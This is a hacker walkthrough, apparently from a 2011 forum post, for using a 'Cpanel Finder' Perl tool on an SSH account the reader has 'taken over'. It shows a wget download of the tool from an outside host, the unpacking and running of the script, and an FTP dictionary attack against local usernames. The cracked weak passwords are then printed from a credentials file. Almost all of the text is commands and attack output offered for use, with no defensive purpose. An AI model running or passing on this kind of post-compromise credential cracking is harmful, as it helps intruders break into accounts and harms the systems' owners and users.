suggested run on ssh acc that u have taken over
==========
ev1lut10n@ev1l:~$ wget jayakonstruksi.com/backupintsec/ev1cpanel_finder.tgz
--2011-08-31 16:55:31-- http://jayakonstruks.../e...finder.tgz
Resolving jayakonstruksi.com... 202.155.61.121
Connecting to jayakonstruksi.com|202.155.61.121|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2638 (2.6K) [application/x-tar]
Saving to: `ev1cpanel_finder.tgz'
100%[===================================================================================================================>] 2,638 --.-K/s in 0.01s
2011-08-31 16:55:31 (204 KB/s) - `ev1cpanel_finder.tgz' saved [2638/2638]
ev1lut10n@ev1l:~$ tar zxvf ev1cpanel_finder.tgz
ev1cpanel_finder/
ev1cpanel_finder/ftp_credentials.txt
ev1cpanel_finder/ev1cp.pl
ev1cpanel_finder/invalid_user_lists.txt
ev1cpanel_finder/password.txt
ev1lut10n@ev1l:~$ cd ev1cpanel_finder
ev1lut10n@ev1l:~/ev1cpanel_finder$ perl ev1cp.pl
============
than just wait for some hours ;-p
=========
ev1lut10n@ev1l:~/ev1cpanel_finder$ perl ev1cp.pl
_____
___ _ _< / /
/ -_) |/ / / /
__/|___/_/_/ uti0n Cpanel Finder
H3llc0me to ev1lut10n Cpanel Finder version 1.0
checking whether 21 is open or not at :
ev1lut10n@ev1l:~/ev1cpanel_finder$
Start ftp dict attack at 127.0.0.1 for username:bojing
Start ftp dict attack at 127.0.0.1 for username:ev1lut10n
testing bojing and bojing at 127.0.0.1
Start ftp dict attack at 127.0.0.1 for username:kacung
snippped-----------
_____
___ _ _< / /
/ -_) |/ / / /
__/|___/_/_/ uti0n Cpanel Finder
H3llc0me to ev1lut10n Cpanel Finder version 1.0
Finished ! please check ftp_credentials.txt, if null means fail epic !
ev1lut10n@ev1l:~/ev1cpanel_finder$ cat ftp_credentials.txt
null
[+] w00t kacung : 123 found !!!
[+] w00t bojing : 12345 found !!!
==========
on success u got some weak password on that box